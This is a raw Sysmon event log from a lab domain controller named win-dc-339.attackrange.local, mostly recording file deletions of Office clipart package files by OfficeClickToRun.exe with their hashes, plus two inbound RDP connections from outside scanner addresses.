23542300x800000000000000066382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00720_.WMFMD5=2E20187E7DAF3640BC68735A7F6F4A9E,SHA256=739C9D90B11EE9A8FD265EB1829BFC27E847E8F6EE507618194E53ACD19F70DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00693_.WMFMD5=C792F0FA03C2433A60638E18C0A20DC6,SHA256=D652B10CC8341C5695A0F8CC975A245B69FA800CAEE1FDCC6E3CC1A920481220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00686_.WMFMD5=054DFEEC114DF169BC9159915F03E86B,SHA256=287ABA199714925836C329DBD9CBB98EB93E63EB17B1F9E9A659E18EC12BC2D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00685_.WMFMD5=45C2CF0C40C0B95866830A5C62845BFA,SHA256=65ECE95DCD03663AEBAC81E76133F52456886AD21704653BC6870CCFB306332A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00668_.WMFMD5=0BDAA8DF56BEDE7E9F5D3DA076905340,SHA256=4FABB3FB2796500A4825C8619DCEC59C1A6E3765A0D5FD5292257183AD8705BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00640_.WMFMD5=BBECF40C6AB6E53B4B3FBAF4BBAF3281,SHA256=FCBE5BF8D2476A7920DF0999C2410E2F94CE4EAC6160BA0AAC0BFCD037357387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00633_.WMFMD5=BFB8876EC267EFDB42FF4F2BE8246178,SHA256=74AC7845262883D21417D3C57E95789C60B3470AE61C3968C59D7B9296883920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00608_.WMFMD5=6214AD51C752892F5CC6C092C8AE513B,SHA256=E9D5DEEB437090292C739880F7FC58212421B21C992ADD5DCA5905EF278E4829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00578_.WMFMD5=62105C8BA97EAB59BDE5501BE8EF60A8,SHA256=D0BC83BC0F9DEFB87D69EF2400D982824E70E66D48855571A08E0C0B13CC0592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00563_.WMFMD5=92F83FD244F6330290955735880C069D,SHA256=55EA6335D92DAEF5B6295F5AF29C4DD385D3A01168705FA60053EFCC0B15DAEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00559_.WMFMD5=CC1B7239A11959ED210844CCBA459CD1,SHA256=500EDB2879F79BEC453D5265386ABC8CB5732432804437DFC858A24E673FD9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00555_.WMFMD5=08B86306D587927D3BA00C2C0D578E4F,SHA256=F8F6ACD5BC9A32D9539544481667DFE161240C1AA575535FA2C5C60BCF0BA55D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00542_.WMFMD5=C2AAA97C76D402B1FB07539805D9905E,SHA256=753274724CF3BECB4F8E700870EBAF7828F2C5BFCF97F5370B5C0E694D42EF84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00531_.WMFMD5=7F789ECF7A14ED50E293D4F4D0D6F5F4,SHA256=7759577F7D1AAA839C58016700FE57E2478A811B65323C01F6B0E5D8FB7C4D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00489_.WMFMD5=A78F824A9580F1595AD43537C10C2658,SHA256=563E6557929BFD125BFE25FC9C6BF442A5CD3EB159660220C3CA59E216869013,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00485_.WMFMD5=48DDC2034556A5277E7E4D1692676694,SHA256=6F99490DC29BE52EAB84A322E06A1FE33036EE96AFFCEE0CC50AA944453119B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00478_.WMFMD5=7750DE99B26987801F9126661B5D84EF,SHA256=83D1907B61793D001934CDC59C00329AF0E213DE8D428072A0BD2DB6065E6B61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00468_.WMFMD5=BD804EC7C6CA5E9D1F6359FCE578EA32,SHA256=A96F20F012E526D19B9F48B68BB33E17D044663835407390EE990C9BC2BB1842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00272_.WMFMD5=6120AC1DE46F2C316FF8C5872627468F,SHA256=2D678F915256C168DEE44070DDD456063E565CCE1F782A1B4D0AF69B25822A31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00231_.WMFMD5=0ACB505D0EB4D6753FA850BAC3501439,SHA256=65A9E45375A8F4069333F460EEAA796462F00B6A94A3715351FDEAEE1BE1EF5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00052_.WMFMD5=F62E25955D88DB2B4AF21A4BC660DE90,SHA256=E6FD709B4C69F248414C940152358AB12666B903BED596FBB41CFD1D1FA5F42A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00050_.WMFMD5=50711B7EE66975A0DC5AA26FFD48EF01,SHA256=11AC87FB80DEC09969644A4222587114ADCB8386A390CA5CA7ED80C3733CA988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00049_.WMFMD5=30AEA1C6312003FDE0511D0E6DD07A97,SHA256=00B3AFBF6D3A33F5F4022A78CE2393851D7A650BF4B057100621176CE44DE9BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00034_.WMFMD5=62664DA832AA02170533EB6F49BC2821,SHA256=0486EDF72D34FFF9603F4F0E4DE90225D4AB2CDF0A43B1206209B995B81B8539,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00014_.WMFMD5=5903FFB2FAE40A17958FE113905F681C,SHA256=B397448C5F55E950813628C2DCFE969E3D3C11AF7A9D7AB876F76FE9088252A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00013_.WMFMD5=9A27E2B96575AA32B6D8F879C9B60C5B,SHA256=DFC79F0D9B5B3D298EAA5ADCFEDE9F984C10F4D20FEAC518A88084B46B014BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_10.MIDMD5=6CF5A9111FEC0E52EEC4E7676CF3A1E4,SHA256=D79E7B38361AA437DCDF360A5AD4EE0D6AEF62F2EA0DB4C39CEEAF23261B168C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_09.MIDMD5=60E454EA05EE72FF65B10D804D9AC127,SHA256=FAB6C0FC2BD25A68AC7F6BC4760F9EC67693B1F462D74137AA6DF10032F07F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_08.MIDMD5=5BD3E0E419DD72EB10F6DAB87CF7B09A,SHA256=1593B34D8933DC8B27FE0AD53FB39D3A7450B37C6F4F3A72B91EB9FE3F5207EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_07.MIDMD5=74F40D6867D992415897995B519EFC89,SHA256=B40DF5FA3E863F15ADCCC950C9B441314C31C8323B83DCC81D7A32E0CDC2176E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_06.MIDMD5=4991F63D0B25D1AA186784427CEB6FB4,SHA256=82A0D63EF35B4C309E0D9FC0039E87C4FDD284C38478DC0DC831B54225142B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_05.MIDMD5=CE44F3232A8FE5CBA24102FFB22A1B59,SHA256=1FF3FE657CFD8BC4616046CD5D310C3011B8CE1C15D9465C082F07A9EFDBC089,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000066350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.715{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19483-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000066349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.250{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58177-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000066348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_04.MIDMD5=FE90A7B4FFB3A7BEED7D93460E66B1FC,SHA256=847867E8556465933A9A9F75E6DC979D52C23438CAD03EF1428549744FC8A1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_03.MIDMD5=D7CB37E8B27C5F9666258150EC297393,SHA256=FECBF1AAD05C1B6E25D98F0DD9324D0F59AE07CB2730A90152DA6B3B424135D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_02.MIDMD5=95976B8197E709AAA2A1CFA8935F7043,SHA256=9C2304F5C0662ACCB1F176304714227C97FE635F321E1FA2630895179D05B3A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PARNT_01.MIDMD5=EFFBCF6772596D32C9937725BF187AA6,SHA256=C43E3AB54A51412237E39BB5B615BEEF96660EF6D1F24149733FE0E41EC21FF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PAPER_01.MIDMD5=2D4FB03C4BBEB0269FE2CBCBF989B051,SHA256=07EC1473038F8F9BCF1911931DC8A54B46B58ED1DB96F7EE4E1ACDB8F8B69EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\OUTDR_01.MIDMD5=993E09A9686FAFB434FB3A7D07E48299,SHA256=F72EBCA8EC6D8AD521569C9D5CF6BF7549D43865B2A168B6E1078DE54615A828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\OCEAN_01.MIDMD5=2BEB3272B3A7361E1AE54167BCCD0B5F,SHA256=6DCBC7A55EA913959A8670BC2B92ECE1FD84270F4B4F19E671E22D024026AB9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NBOOK_01.MIDMD5=D9CB5BE8DCD7F6A7C2196E6C6BAB64B5,SHA256=71B146FCD64E09C66E12A31A29677BDCC5ECCF786D91A846502FF8505DB1F9EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02453_.WMFMD5=652DFE8188B16DA0A8E6A5B236EE4B62,SHA256=78A09F4B554FD9B412FF79FE914A75709F7C4C28C8E1AAEE8BDFD82065A4F49D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02451_.WMFMD5=2CCAD4B27529252DDC679A2218AB7076,SHA256=10331B1F49FD694CF06B3071A5565AD4DDB1E1B3327FF5F0C70FAB4B957B2046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA02450_.WMFMD5=9EF6A9E6D365D47291CEA6434C482818,SHA256=C72EB66D86F9C09A183A3912ED18FAE0945005C513B508651522977A91D7432B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 